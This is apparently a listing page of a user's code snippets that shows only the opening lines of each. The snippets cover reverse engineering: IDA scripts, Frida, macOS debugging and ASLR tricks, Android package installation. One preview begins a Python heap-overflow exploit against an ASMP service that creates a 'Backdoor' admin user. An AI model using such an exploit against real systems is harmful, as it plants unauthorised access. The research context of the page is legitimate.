apkunpacker

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

Compilation

apkunpacker

import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8  = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211  # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")

apkunpacker

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>

/* ASLR disabling magic constant from Apple LLDB source code
   https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/

apkunpacker

"""
summary: drawing custom graphs
description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.
keywords: graph, actions
"""

from __future__ import print_function
# -----------------------------------------------------------------------

apkunpacker

from idautils import Segments, Functions, XrefsTo, XrefTypeName
from idc import get_segm_name, get_segm_end

class Dictionary(dict):
    def add(self, key, value):
        self[key] = value

xref_dict = Dictionary()

for segea in Segments():

apkunpacker

package io.github.a13e300.demo.maho

import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageInstaller.EXTRA_STATUS
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION

apkunpacker

jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
->  % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time    (current threads): 0.046565 s / 0.036279 s

apkunpacker

#! /bin/bash
# Simple Utility Script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developer that would like keep developing without turning SIP off.
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers.
#
# Please note:
# - Modern Logic (on M1s) uses `AUHostingService` which resides within the system thus not patchable and REQUIRES to turn-off SIP.
# - Some hosts uses separate plug-in scanning or sandboxing. 
#     if that's the case, it's required to patch those (if needed) and attach debugger to them instead.

apkunpacker

// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>

int main() {
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());

apkunpacker

import threading

from frida_tools.application import Reactor

import frida


class Application:
    def __init__(self):
        self._stop_requested = threading.Event()